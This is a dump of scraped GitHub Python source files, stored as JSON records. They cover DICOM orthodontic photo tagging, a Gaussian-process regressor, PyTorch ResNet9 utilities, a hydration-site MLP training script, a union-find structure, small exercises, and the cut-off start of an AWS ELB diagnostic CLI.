`(train_count, response_count)` whose rows consist\n of response vectors of the train data.\n\n\n Returns\n -------\n posterior_mean:\n The predicted response associated with each test observation.\n precomputed_coefficients_matrix:\n A matrix of shape `(train_count, nn_count)` whose rows list the\n precomputed coefficients for each nearest neighbors set in the\n training data.\n timing:\n A dictionary containing timings for the training, precomputation,\n nearest neighbor computation, and prediction.\n\n \"\"\"\n time_start = perf_counter()\n (\n precomputed_coefficients_matrix,\n nn_indices,\n ) = _decide_and_make_fast_regressor(\n muygps,\n nbrs_lookup,\n train_features,\n train_targets,\n )\n time_precomp = perf_counter()\n\n time_agree = perf_counter()\n nn_indices = fast_nn_update(nn_indices)\n\n test_neighbors, _ = nbrs_lookup.get_nns(test_features)\n time_nn = perf_counter()\n\n closest_neighbor = test_neighbors[:, 0]\n closest_set_new = nn_indices[closest_neighbor, :].astype(int)\n num_test_samples, _ = test_features.shape\n\n posterior_mean = fast_posterior_mean_from_indices(\n muygps,\n mm.arange(0, num_test_samples),\n closest_set_new,\n test_features,\n train_features,\n closest_neighbor,\n precomputed_coefficients_matrix,\n )\n time_pred = perf_counter()\n\n timing = {\n \"precompute\": time_precomp - time_start,\n \"agree\": time_agree - time_precomp,\n \"nn\": time_nn - time_agree,\n \"pred\": time_pred - time_nn,\n }\n\n return posterior_mean, precomputed_coefficients_matrix, timing\n","repo_name":"bwpriest/MuyGPyS","sub_path":"MuyGPyS/examples/fast_posterior_mean.py","file_name":"fast_posterior_mean.py","file_ext":"py","file_size_in_byte":13023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"9152204116","text":"# pylint: disable=invalid-name\n''' Orthodontic Photograph Classes.\n\nAdds SNOMED CT codes in DICOM object for Orthodontic Views.\n\n'''\n\nimport logging\nfrom datetime import datetime\nfrom pydicom.sequence import Sequence\nfrom pydicom.dataset import Dataset\n\nfrom dicom4ortho.model import PhotographBase\nimport dicom4ortho.m_tooth_codes as ToothCodes\nfrom dicom4ortho import defaults\nfrom dicom4ortho.m_ada1107 import ADA1107\n\nALLOWED_TEETH = {\n \"EV01\": [],\n \"EV02\": [],\n \"EV03\": [],\n \"EV04\": [],\n \"EV05\": [],\n \"EV06\": [],\n \"EV07\": [],\n \"EV08\": [],\n \"EV09\": [],\n \"EV10\": [],\n \"EV11\": [],\n \"EV12\": [],\n \"EV13\": [],\n \"EV14\": [],\n \"EV15\": [],\n \"EV16\": [],\n \"EV17\": [],\n \"EV18\": [],\n \"EV19\": [],\n \"EV20\": [],\n \"EV21\": [],\n \"EV22\": [],\n \"EV23\": [],\n \"EV24\": [],\n \"EV25\": [],\n \"EV26\": [],\n \"EV27\": [],\n \"EV28\": [],\n \"EV29\": [],\n \"EV30\": [],\n \"EV31\": [],\n \"EV32\": [],\n \"EV33\": [],\n \"EV34\": [],\n \"EV35\": [],\n \"EV36\": [],\n \"EV37\": [],\n \"EV38\": [],\n \"EV39\": [],\n \"EV40\": [],\n \"EV41\": [],\n \"EV42\": [],\n \"EV43\": [],\n\n \"IV01\": [\n '11', '12', '13', '14', '15', '16', '17', '18',\n '41', '42', '43', '44', '45', '46', '47', '48',\n ],\n \"IV02\": [\n '11', '12', '13', '14', '15', '16', '17', '18',\n '41', '42', '43', '44', '45', '46', '47', '48',\n ],\n \"IV03\": [],\n \"IV04\": [],\n \"IV05\": [],\n \"IV06\": [],\n \"IV07\": [],\n \"IV08\": [],\n \"IV09\": [],\n \"IV10\": [],\n \"IV11\": [],\n \"IV12\": [],\n \"IV13\": [],\n \"IV14\": [],\n \"IV15\": [],\n \"IV16\": [],\n \"IV17\": [],\n \"IV18\": [\n '21', '22', '23', '24', '15', '26', '27', '28',\n '31', '32', '33', '34', '35', '36', '37', '38',\n ],\n \"IV19\": [\n '21', '22', '23', '24', '15', '26', '27', '28',\n '31', '32', '33', '34', '35', '36', '37', '38',\n ],\n \"IV20\": [],\n \"IV21\": [],\n \"IV22\": [],\n \"IV23\": [],\n \"IV24\": [],\n \"IV25\": [],\n \"IV26\": [],\n \"IV27\": [],\n \"IV28\": [],\n \"IV29\": [],\n \"IV30\": [],\n\n}\n\n\nclass OrthodonticPhotograph(PhotographBase):\n \"\"\" An Orthodontic Photograph as defined in WP-1100\n\n arguments:\n\n image_type: a 4 digit ortho photo type code as specified in WP-1100. Ex. EV01\n\n input_image_filename: name of input image file\n\n output_image_filename: name of output image file\n \"\"\"\n type_keyword = \"\" # Orthodontic View String, e.g. \"IV03\"\n ada1107_view = None # Row in ADA-1107 views.csv for this particular view\n teeth = None\n treatment_event_type = None\n days_after_event = None\n\n def __init__(self, **metadata):\n super().__init__(**metadata)\n self.ada1107 = ADA1107()\n self.teeth = metadata.get('teeth')\n if metadata.get('image_type') is not None:\n # Allow for both dash separated and not separated naming\n self.type_keyword = metadata.get('image_type').replace('-', '')\n self.ada1107_view = self.ada1107.VIEWS.get(self.type_keyword)\n\n patient_birthdate = metadata.get('patient_birthdate')\n if patient_birthdate is not None:\n try:\n self.patient_birthdate = datetime.strptime(patient_birthdate, defaults.IMPORT_DATE_FORMAT).date()\n except (ValueError, TypeError):\n logging.warn(f\"Invalid Patient Birthdate {patient_birthdate}\")\n \n self.study_instance_uid = metadata.get('study_instance_uid')\n self.study_description = metadata.get('study_description')\n self.series_instance_uid = metadata.get('series_instance_uid')\n self.series_description = metadata.get('series_description')\n self.patient_firstname = metadata.get('patient_firstname','')\n self.patient_lastname = metadata.get('patient_lastname','')\n self.patient_id = metadata.get('patient_id','')\n self.patient_sex = metadata.get('patient_sex','')\n self.dental_provider_firstname = metadata.get('dental_provider_firstname','')\n self.dental_provider_lastname = metadata.get('dental_provider_lastname','')\n self.equipment_manufacturer = metadata.get('manufacturer')\n self.treatment_event_type = metadata.get('treatment_event_type')\n self.days_after_event = metadata.get('days_after_event')\n\n # TODO: extract this to a higher level to give the user the ability to set it when needed.\n # See https://github.com/open-ortho/dicom4ortho/issues/16\n self._ds.BurnedInAnnotation = metadata.get('burned_in_annotation','NO')\n \n # this hardcoding might not be ideal here. But for all orthodontic photography purposes that i am aware of, this is always DSC. These could come from EXIF. See https://dicom.nema.org/medical/dicom/current/output/chtml/part17/chapter_NNNN.html but they might not. The code here should \n self._ds.SceneType = 1 # Digital Still Camera (DSC): direct image capture\n self._ds.FileSource = 3 # Digital Still Camera (DSC)\n \n # TODO: extract this to a higher level to give the user the ability to set it when needed.\n # Use when the staff is taking test shots. Then it is not expected for the view in question to actually show the correct view for the patient.\n # See http://dicom.nema.org/medical/dicom/current/output/chtml/part03/sect_C.7.6.12.html#sect_C.7.6.12 . In these cases, the Phantom would have to go in the Device Sequence. For regular usage, we should safely be able to set this to 'NO'.\n # See https://github.com/open-ortho/dicom4ortho/issues/15\n self._ds.QualityControlImage = 'NO'\n\n def _get_code_dataset(self, ada1107_code_keyword) -> Dataset:\n \"\"\" Construct a DICOM Dataset from a row in the codes.csv of ADA1107 \n\n ada1107_code must be a dictionary with the following keys:\n code\n codeset\n meaning\n \"\"\"\n ada1107_code = self.ada1107.CODES.get(ada1107_code_keyword)\n if ada1107_code == None:\n logging.warning(f\"Keyword [{ada1107_code_keyword}] did not match any code. Skipping.\")\n return None\n code_dataset = Dataset()\n code_dataset.CodeMeaning = ada1107_code.get(\n 'meaning')[:64] # LO only allows 64 characters\n code_dataset.CodeValue = ada1107_code.get('code')\n code_dataset.CodingSchemeDesignator = ada1107_code.get('codeset')\n return code_dataset\n\n def _get_code_sequence(self, ada1107_code_keyword) -> Sequence:\n code_dataset = self._get_code_dataset(ada1107_code_keyword)\n if code_dataset is None:\n return None\n return Sequence([code_dataset])\n\n def _set_dicom_attributes(self):\n # Get the array of functions to set this required type.\n logging.debug(f'Setting DICOM attributes for {self.type_keyword}')\n\n # Make a nice comment from keyword and description\n ImageComments = f\"{self.type_keyword}^{self.ada1107_view.get('ImageComments')}\"\n\n # NBSP character OxA0 is not allowed in Image Comments. Replace with a\n # Space (0x20)\n self._ds.ImageComments = ImageComments.replace('\\xa0', '\\x20')\n self._ds.SeriesDescription = self.ada1107_view.get('SeriesDescription')\n\n\n patient_orientation_code = self.ada1107.CODES.get(self.ada1107_view.get('PatientOrientation'))\n if patient_orientation_code is None: \n patient_orientation_code = self.ada1107.CODES.get('OrientationFront')\n logging.warning(f\"PatientOrientation not found for {self.output_image_filename}. Defaulting to {patient_orientation_code}\")\n self._ds.PatientOrientation = patient_orientation_code.get('code').split('^')\n self._ds.ImageLaterality = self.ada1107.CODES.get(\n self.ada1107_view.get('ImageLaterality')).get('code')\n\n self.add_device()\n self.add_anatomic_region()\n self.add_view_code()\n self.add_primary_anatomic_structure()\n self.add_acquisition_context()\n # self.add_teeth()\n\n def add_acquisition_context(self):\n def add_progress():\n if self.treatment_event_type and self.days_after_event:\n acs_ds = Dataset()\n acs_ds.ValueType = 'CODE'\n acs_ds.ConceptNameCodeSequence = self._get_code_sequence(\"TemporalEventType\") \n acs_ds.ConceptCodeSequence = self._get_code_sequence(self.treatment_event_type)\n AcquisitionContextSequence.append(acs_ds)\n\n acs_ds = Dataset()\n acs_ds.ValueType = 'NUMERIC'\n acs_ds.ConceptNameCodeSequence = self._get_code_sequence(\"OffsetFromEvent\") \n acs_ds.MeasurementUnitsCodeSequence = self._get_code_sequence(\"day\")\n acs_ds.NumericValue = self.days_after_event\n AcquisitionContextSequence.append(acs_ds)\n\n AcquisitionContextSequence = Sequence([])\n # Find all columns which start with AcquisitionContextSequence in ada1107_view\n for index, key in enumerate(self.ada1107_view):\n if key.startswith(\"AcquisitionContextSequence\"):\n concept_name = key.split(\"^\")[1]\n concept_name_code_sequence = self._get_code_sequence(\n concept_name)\n for concept_code in self.ada1107_view.get(key).split(\"^\"):\n if concept_code != \"na\" and len(concept_code) > 0:\n acs_ds = Dataset()\n acs_ds.ValueType = 'CODE'\n acs_ds.ConceptNameCodeSequence = concept_name_code_sequence\n acs_ds.ConceptCodeSequence = self._get_code_sequence(concept_code)\n AcquisitionContextSequence.append(acs_ds)\n add_progress()\n self._ds.AcquisitionContextSequence = AcquisitionContextSequence\n\n def add_device(self):\n DeviceSequence = Sequence([])\n for device in self.ada1107_view.get('DeviceSequence').split(\"^\"):\n if device != \"na\" and len(device) > 0:\n DeviceSequence.append(self._get_code_dataset(device))\n # The AnatomicRegionModifierSequence must be part of AnatomicRegionSequence\n if (len(DeviceSequence) > 0):\n self._ds.DeviceSequence = DeviceSequence\n\n def add_anatomic_region(self):\n # AnatomicRegionSequence allows for a single value\n self._ds.AnatomicRegionSequence = self._get_code_sequence(\n self.ada1107_view.get('AnatomicRegionSequence'))\n\n # More than one AnatomicRegionModifierSequence are allowed\n AnatomicRegionModifierSequence = Sequence([])\n for arm in self.ada1107_view.get('AnatomicRegionModifierSequence').split(\"^\"):\n if arm != \"na\" and len(arm) > 0:\n AnatomicRegionModifierSequence.append(self._get_code_dataset(arm))\n # The AnatomicRegionModifierSequence must be part of AnatomicRegionSequence\n if (len(AnatomicRegionModifierSequence) > 0):\n self._ds.AnatomicRegionSequence[0].AnatomicRegionModifierSequence = AnatomicRegionModifierSequence\n\n def add_view_code(self):\n \"\"\" Identical function as add_anatomic_region()\n \"\"\"\n # ViewCodeSequence allows for a single value\n self._ds.ViewCodeSequence = self._get_code_sequence(\n self.ada1107_view.get('ViewCodeSequence'))\n\n # More than one AnatomicRegionModifierSequence are allowed\n ViewModifierCodeSequence = Sequence([])\n for vmcs in self.ada1107_view.get('ViewModifierCodeSequence').split(\"^\"):\n if vmcs != \"na\" and len(vmcs) > 0:\n ViewModifierCodeSequence.append(self._get_code_dataset(vmcs))\n # The AnatomicRegionModifierSequence must be part of AnatomicRegionSequence\n if (len(ViewModifierCodeSequence) > 0):\n self._ds.ViewCodeSequence[0].ViewModifierCodeSequence = ViewModifierCodeSequence\n\n def add_primary_anatomic_structure(self):\n # PrimaryAnatomicStructureSequence allows for multiple values, but currently only one is supported by this code.\n pas = self.ada1107_view.get('PrimaryAnatomicStructureSequence')\n if pas != \"na\" and len(pas) > 0:\n self._ds.PrimaryAnatomicStructureSequence = self._get_code_sequence(\n pas)\n\n # More than one AnatomicRegionModifierSequence are allowed\n PrimaryAnatomicStructureModifierSequence = Sequence([])\n for pasm in self.ada1107_view.get('PrimaryAnatomicStructureModifierSequence').split(\"^\"):\n if pasm != \"na\" and len(pasm) > 0:\n PrimaryAnatomicStructureModifierSequence.append(\n self._get_code_dataset(pasm))\n # The AnatomicRegionModifierSequence must be part of AnatomicRegionSequence\n if (len(PrimaryAnatomicStructureModifierSequence) > 0):\n self._ds.PrimaryAnatomicStructureSequence[\n 0].PrimaryAnatomicStructureModifierSequence = PrimaryAnatomicStructureModifierSequence\n\n def add_teeth(self):\n teeth = self.teeth\n logging.debug(\"Adding teeth\")\n if teeth == defaults.ADD_MAX_ALLOWED_TEETH:\n logging.debug(\"Setting all possibly allowed teeth.\")\n teeth = ALLOWED_TEETH[self.type_keyword]\n\n if len(teeth) > 0:\n if not hasattr(self._ds, 'PrimaryAnatomicStructureSequence'):\n self._ds.PrimaryAnatomicStructureSequence = Sequence([])\n\n for tooth in teeth:\n if ToothCodes.is_valid_tooth_number(tooth):\n self._ds.PrimaryAnatomicStructureSequence.append(\n self._get_code_dataset(*ToothCodes.SCT_TOOTH_CODES[tooth]))\n\n def is_extraoral(self) -> bool:\n if self.type_keyword.startswith(\"EV\"):\n return True\n else:\n return False\n\n def is_intraoral(self) -> bool:\n if self.type_keyword.startswith(\"IV\"):\n return True\n else:\n return False\n\n def save(self, filename=None):\n filename = filename or self.output_image_filename\n self.set_image()\n self._set_dicom_attributes()\n \n # We cannot save without UIDs. If the user hasn't added them, we must do so now.\n if self._ds.StudyInstanceUID is None:\n self._ds.StudyInstanceUID = defaults.generate_dicom_uid()\n if self._ds.SeriesInstanceUID is None:\n self._ds.SeriesInstanceUID = defaults.generate_dicom_uid()\n \n self._ds.save_as(filename=filename, write_like_original=False)\n logging.info(f\"File [{filename}] saved.\")\n\n\nclass OrthodonticSeries():\n \"\"\" Class representing an Orthodontic Photo session.\n\n Examples of orthodontic series:\n\n * A set of intra-oral photographs take on the same day for the same appointment.\n * A set of extra-oral photographs take on the same day for the same appointment.\n\n \"\"\"\n # SeriesInstanceUID\n UID = None\n StudyUID = None\n\n Photos = None\n\n def __init__(self, **kwargs) -> None:\n \"\"\" New Orthodontic Series\n\n :uid: The Series DICOM UID. Defaults to generating a new one.\n :description: The Series Description to add to all photos.\n \"\"\"\n self.description = kwargs.get(\"description\")\n self.UID = kwargs.get(\"uid\") or defaults.generate_dicom_uid()\n self.Photos = []\n\n def __len__(self):\n return len(self.Photos)\n\n def add(self, photo: OrthodonticPhotograph) -> None:\n self.Photos.append(photo)\n\n def save(self) -> None:\n logging.info(\n f\"Requested to save {len(self.Photos)} Photos within Series {self.UID}\")\n for photo in self.Photos:\n photo.series_description = self.description\n photo.series_instance_uid = self.UID\n photo.study_instance_uid = self.StudyUID\n photo.save()\n\n\nclass OrthodonticStudy():\n \"\"\" Class representing an Orthodontic Photo visit.\n\n Examples of orthodontic study:\n\n * As part of the same appointment/visit/encounter, the staff takes intraoral and extraoral photographs of the patient. While the intraoral and the extra oral are in separate series, they are both part of the same study.\n * During the same day an X-Ray is taken, that would go in a separate Study.\n\n \"\"\"\n # SeriesInstanceUID\n UID = None\n Series = None\n\n def __init__(self, **kwargs) -> None:\n \"\"\" New Orthodontic Study\n\n :uid: The Series DICOM UID. Defaults to generating a new one.\n :description: The Study Description to add to all photos.\n \"\"\"\n self.UID = kwargs.get(\"uid\") or defaults.generate_dicom_uid()\n self.Series = []\n\n def __len__(self):\n return len(self.Series)\n\n def add(self, serie: OrthodonticSeries) -> None:\n serie.StudyUID = self.UID\n self.Series.append(serie)\n\n def save(self) -> None:\n logging.info(\n f\"Requested to save {len(self.Series)} Series within Study {self.UID}\")\n for serie in self.Series:\n serie.save()\n","repo_name":"open-ortho/dicom4ortho","sub_path":"dicom4ortho/m_orthodontic_photograph.py","file_name":"m_orthodontic_photograph.py","file_ext":"py","file_size_in_byte":17082,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"34744689174","text":"#Pig Latin\r\n\r\nvowels = ['a','e','i','o','u']\r\n\r\n#easier to use an extra function to apply to both names\r\ndef pig(w):\r\n #get rid of uppercase so they dont get in the way\r\n w = w.lower()\r\n pigw = ''\r\n #make word a list so accessing each letter is easier\r\n lw = list(w)\r\n if lw[0] in vowels:\r\n #if first letter is a vowel, pigword is just normal word + yay\r\n pigw += w + 'yay'\r\n elif lw[0] not in vowels:\r\n #note the first letter and get rid of it\r\n fletter = lw[0]\r\n lw.remove(fletter)\r\n #make the list back into a string\r\n for i in range(len(lw)):\r\n pigw += lw[i]\r\n #add back on the first letter as well as ay\r\n pigw += fletter + 'ay' \r\n return pigw\r\n\r\ndef nameToPig(f,l):\r\n return [pig(f),pig(l)]\r\n\r\nprint(nameToPig(\"Tyler\",\"Andrews\"))\r\nprint(nameToPig(\"Barrack\",\"Obama\"))\r\n","repo_name":"andre205/CPSC230","sub_path":"TAndrews_Assignment9/Piglatin.py","file_name":"Piglatin.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36035671221","text":"import os\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom utils_funcs import to_device, accuracy, conv_block\n\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport pygame\n\nclass Car:\n def __init__(self, env):\n \"\"\"\n Initialize the Car class.\n\n Args:\n env: MountainCar-v0 environment\n \"\"\"\n # Action size = 3\n # Go left, Go right, Don't move\n self.action_size = env.action_space.n\n print(f\"MountainCAr-v0 action size: {self.action_size}\")\n\n # Define actions in a key map\n self.KEY_MAPPING = {\n pygame.K_LEFT: 0, # Accelerating to the left: Action(0)\n pygame.K_RIGHT: 2, # Accelrating to the right: Action(2)\n pygame.K_DOWN: 1, # No acceleration: Action(1)\n }\n\n def get_action(self, pressed_key):\n \"\"\"\n Map pressed key to a corresponding action.\n\n Args:\n pressed_key: Key code of the pressed key\n\n Returns:\n int: Action corresponding to the pressed key\n \"\"\"\n # Set default behavior to DOWN button. This way the mountain car won't move if\n # no signal is detected.\n return self.KEY_MAPPING.get(pressed_key, self.KEY_MAPPING[pygame.K_DOWN])\n\nclass DeviceDataLoader:\n \"\"\"\n Utility class to move batches of data to a desired device.\n \"\"\"\n def __init__(self, data_loader, device):\n self.data_loader = data_loader\n self.device = device\n\n def __iter__(self):\n \"\"\"Yield a batch of data after moving it to device\"\"\"\n for batch in self.data_loader:\n yield to_device(batch, self.device)\n\n def __len__(self):\n \"\"\"\n Returns the number of batches in the DataLoader.\n \"\"\"\n return len(self.data_loader)\n\n\nclass ImageClassificationBase(nn.Module):\n \"\"\"\n Base class for image classification tasks. Provides methods for training and validation steps.\n \"\"\"\n def training_step(self, batch):\n \"\"\"\n Compute the loss for a batch of training data.\n\n Args:\n batch (tuple): A tuple containing images and their respective labels.\n\n Returns:\n torch.Tensor: The computed loss.\n \"\"\"\n images, labels = batch\n out = self(images) # Generate predictions\n loss = F.cross_entropy(out, labels) # Calculate loss\n return loss\n\n def validation_step(self, batch):\n \"\"\"\n Compute the loss and accuracy for a batch of validation data.\n\n Args:\n batch (tuple): A tuple containing images and their respective labels.\n\n Returns:\n dict: A dictionary containing the computed validation loss and accuracy.\n \"\"\"\n images, labels = batch\n out = self(images) # Generate predictions\n loss = F.cross_entropy(out, labels) # Calculate loss\n acc = accuracy(out, labels) # Calculate accuracy\n return {\"val_loss\": loss.detach(), \"val_acc\": acc}\n\n def validation_epoch_end(self, outputs):\n \"\"\"\n Compute the average validation loss and accuracy over an epoch.\n\n Args:\n outputs (list): List of dictionaries containing individual batch losses and accuracies.\n\n Returns:\n dict: A dictionary containing the average validation loss and accuracy for the epoch.\n \"\"\"\n batch_losses = [x[\"val_loss\"] for x in outputs]\n epoch_loss = torch.stack(batch_losses).mean() # Combine losses\n batch_accs = [x[\"val_acc\"] for x in outputs]\n epoch_acc = torch.stack(batch_accs).mean() # Combine accuracies\n return {\"val_loss\": epoch_loss.item(), \"val_acc\": epoch_acc.item()}\n\n def epoch_end(self, epoch, result):\n \"\"\"\n Print the results at the end of an epoch.\n\n \"\"\"\n print(\n \"Epoch [{}], last_lr: {:.5f}, train_loss: {:.4f}, val_loss: {:.4f}, val_acc: {:.4f}\".format(\n epoch,\n result[\"lrs\"][-1],\n result[\"train_loss\"],\n result[\"val_loss\"],\n result[\"val_acc\"],\n )\n )\n\nclass ResNet9(ImageClassificationBase):\n \"\"\"\n A simplified implementation of the ResNet-9 architecture for image classification.\n \"\"\"\n def __init__(self, num_classes, in_channels=3):\n \"\"\"\n Initialize the ResNet9 model.\n\n Args:\n num_classes (int): Number of output classes.\n in_channels (int, optional): Number of input channels. Default is 3 (RGB).\n \"\"\"\n super().__init__()\n\n self.conv1 = conv_block(in_channels, 64)\n self.conv2 = conv_block(64, 128, pool=True)\n self.res1 = nn.Sequential(conv_block(128, 128), conv_block(128, 128))\n\n self.conv3 = conv_block(128, 256, pool=True)\n self.conv4 = conv_block(256, 512, pool=True)\n self.res2 = nn.Sequential(conv_block(512, 512), conv_block(512, 512))\n\n self.classifier = nn.Sequential(\n nn.AdaptiveMaxPool2d(1),\n nn.Flatten(),\n nn.Dropout(0.2),\n nn.Linear(512, num_classes),\n )\n\n def forward(self, batch):\n \"\"\"\n Forward pass of the ResNet9 model.\n\n Args:\n batch (torch.Tensor): The input tensor.\n\n Returns:\n torch.Tensor: The output tensor after passing through the model.\n \"\"\"\n out = self.conv1(batch)\n out = self.conv2(out)\n out = self.res1(out) + out # Residual connection\n out = self.conv3(out)\n out = self.conv4(out)\n out = self.res2(out) + out # Residual connection\n out = self.classifier(out)\n return out\n","repo_name":"hbaghramyan/hand_gesture_mountain_car","sub_path":"utils_classes.py","file_name":"utils_classes.py","file_ext":"py","file_size_in_byte":5667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39136609133","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'findDigits' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts INTEGER n as parameter.\n#\n\ndef findDigits(n):\n count = 0\n act_n = n\n while n > 0:\n digit = n % 10\n if digit != 0:\n if act_n % digit == 0:\n count = count + 1\n n = n // 10\n return count\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(input().strip())\n\n for t_itr in range(t):\n n = int(input().strip())\n\n result = findDigits(n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"burcia1711/hackerrank","sub_path":"problem solving/algorithms/sequenceEquation.py","file_name":"sequenceEquation.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13016198039","text":"import time\nimport torch\nfrom params.mlp_params import config\nfrom models.mlp_model import HydrationNN\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom train.mlp_train_modules import train_loop, validation_loop\nfrom datasets.mlp_dataset import TrainingEmbeddingLoader, ValidationEmbeddingLoader\nfrom utils.utils import shuffle_along_axis, write_loss, save_checkpoint, load_checkpoint, save_metrics\n\n\ndef main():\n torch.set_num_threads(1)\n #To save accuracy metrics\n writer = SummaryWriter(f'./checkpoints/mlp/report/')\n #Load training data\n train_dataset = TrainingEmbeddingLoader(config.train_dataset_path, config.train_dataset_list)\n #Load validation data and shuffle once\n validation_dataset = ValidationEmbeddingLoader(config.validation_dataset_path, config.validation_dataset_list, shuffle=True)\n #Shuffle\n shuffle_time = time.time()\n train_dataset.x = shuffle_along_axis(train_dataset.x, 1)\n #Define loaders\n train_loader = DataLoader(train_dataset, batch_size=config.training_batch_size, shuffle=config.shuffle, num_workers=config.num_workers, pin_memory = config.pin_memory)\n validation_loader = DataLoader(validation_dataset, batch_size=1, shuffle=False, num_workers=config.num_workers, pin_memory = config.pin_memory)\n print(f'Train dataset shuffling took {round(time.time()-shuffle_time,1)} seconds.')\n #Initialize model\n model = HydrationNN(config.first_part_features, config.second_part_features, config.dropout_p)\n #Define optimizer\n model_params = list(model.parameters())\n config.optimizer = config.optim_algorithm(model_params, lr=config.learning_rate, weight_decay=config.weight_dec)\n #Use all available GPUs\n #Load model\n if config.load_model:\n epoch = config.starting_epoch-1\n load_checkpoint(torch.load(config.load_model, map_location=config.device), model, epoch)\n #Use all available GPUs if you want\n if config.parallel:\n if torch.cuda.device_count() > 1:\n print(f\"Let's use, {torch.cuda.device_count()}, GPUs!\")\n model = nn.DataParallel(model)\n model.to(config.device)\n for epoch in range(config.starting_epoch, config.starting_epoch+config.num_epochs):\n #Train you models\n epoch_loss = train_loop(train_loader, model, config)\n #Write loss to tensorboard report\n write_loss(writer, epoch_loss, epoch)\n #Save models every 5 epochs.\n if not (epoch+1)%5:\n #Save model checkpoints according to training devices.\n if config.parallel:\n model_checkpoint = {\"state_dict\": model.module.state_dict()}\n else:\n model_checkpoint = {\"state_dict\": model.state_dict()}\n #Save it\n save_checkpoint(model_checkpoint, epoch, filename=f'./checkpoints/mlp/HydrationNN_epoch_{epoch}.pth.tar')\n #After epoch 20 start evaluation\n if (epoch+1) >= 20:\n #Evaluate models with validation set.\n recall, precision, F1, selected_cap_value, validation_epoch_loss = validation_loop(validation_loader, model, epoch, config)\n #And save metrics\n save_metrics(config.thresholds, writer, recall, precision, F1, selected_cap_value, 'validation', epoch)\n #Every 5 epochs also shuffle training embedding\n shuffle_time = time.time()\n train_dataset.x = shuffle_along_axis(train_dataset.x, 1)\n #Redefine loaders\n train_loader = DataLoader(train_dataset, batch_size=config.training_batch_size, shuffle=config.shuffle, num_workers=config.num_workers, pin_memory = config.pin_memory)\n print(f'Train dataset shuffling took {round(time.time()-shuffle_time,1)} seconds.')\n writer.close()\n return\n\nif __name__ == '__main__':\n main()\n","repo_name":"azamanos/HydraProt","sub_path":"train_mlp.py","file_name":"train_mlp.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28098576046","text":"# Disjoint Set Data Structure with Rank and Path Compression\n\nclass UnionFind:\n def __init__(self, size):\n self.root = list(range(size))\n self.rank = [0] * size\n\n def find(self, x):\n if self.root[x] != x:\n self.root[x] = self.find(self.root[x])\n return self.root[x]\n\n def union(self, x, y):\n x_set, y_set = self.find(x), self.find(y)\n if x_set == y_set:\n return\n if self.rank[x_set] > self.rank[y_set]:\n self.root[y_set] = x_set\n elif self.rank[x_set] < self.rank[y_set]:\n self.root[x_set] = y_set\n else:\n self.root[y_set] = x_set\n self.rank[x_set] += 1\n\n def connected(self, x, y):\n return self.find(x) == self.find(y)\n","repo_name":"IanLiuTW/codebase","sub_path":"Data Structure/Union Find/union_find.py","file_name":"union_find.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2883336566","text":"from __future__ import print_function, unicode_literals\nfrom elb_doctor.lib.elb.get_elbs import GetElbs\nfrom elb_doctor.lib.elb.parse_elbs import ParseElbs\nfrom elb_doctor.lib.tgs.getTargetHealth import getTargetHealth\nfrom elb_doctor.lib.tgs.parseTgHealth import parseTgHealth\nfrom elb_doctor.lib.helpers.utilities import output_renderer\nfrom PyInquirer import prompt\nfrom elb_doctor.lib.helpers.regions import standard_regions,other_regions\nfrom elb_doctor.lib.helpers.elbtypes import elb_types\nfrom elb_doctor.api.elb_doctor_api import ElbDoctorApi\n\n\n\ndef main():\n\n # get_elb = GetElbs()\n api = ElbDoctorApi()\n # parse_elbs = ParseElbs()\n\n questions = [\n {\n 'type': 'list',\n 'name': 'standard_regions',\n 'message': 'What is the AWS region of your ELB?',\n 'choices': standard_regions,\n 'default': 'us-east-1'\n },\n {\n 'type': 'list',\n 'name': 'other_regions',\n 'message': 'Is your ELB in any of the following Opt-in/GovCloud/China region?',\n 'choices': other_regions,\n 'when': lambda answers: answers['standard_regions'] == False\n },\n {\n 'type': 'list',\n 'name': 'elb_type',\n 'message': 'What is the type of your ELB?',\n 'choices': elb_types\n },\n {\n 'type': 'list',\n 'name': 'elb',\n 'message': 'Which CLB are you having issue with?',\n 'choices': api.retrieve_clbs,\n 'when': lambda answers: answers['elb_type'] == 'classic'\n },\n {\n 'type': 'list',\n 'name': 'elb',\n 'message': 'Which ALB are you having issue with?',\n 'choices': api.retrieve_elbv2, #currently there is no better way to call parse_elbs.parse_albs, parse_elbs.parse_nlbs or parse_elbs.parse_gwlbs other than duplicating this question 3 times and use 'when' to control which one to display. get_elbv2 call will also be duplicated as well.\n 'when': lambda answers: answers['elb_type'] == 'application'\n },\n {\n 'type': 'list',\n 'name': 'elb',\n 'message': 'Which NLB are you having issue with?',\n 'choices': api.retrieve_elbv2, #currently there is no better way to call parse_elbs.parse_albs, parse_elbs.parse_nlbs or parse_elbs.parse_gwlbs other than duplicating this question 3 times and use 'when' to control which one to display. get_elbv2 call will also be duplicated as well.\n 'when': lambda answers: answers['elb_type'] == 'network'\n },\n {\n 'type': 'list',\n 'name': 'elb',\n 'message': 'Which GWLB are you having issue with?',\n 'choices': api.retrieve_elbv2, #currently there is no better way to call parse_elbs.parse_albs, parse_elbs.parse_nlbs or parse_elbs.parse_gwlbs other than duplicating this question 3 times and use 'when' to control which one to display. get_elbv2 call will also be duplicated as well.\n 'when': lambda answers: answers['elb_type'] == 'gateway'\n 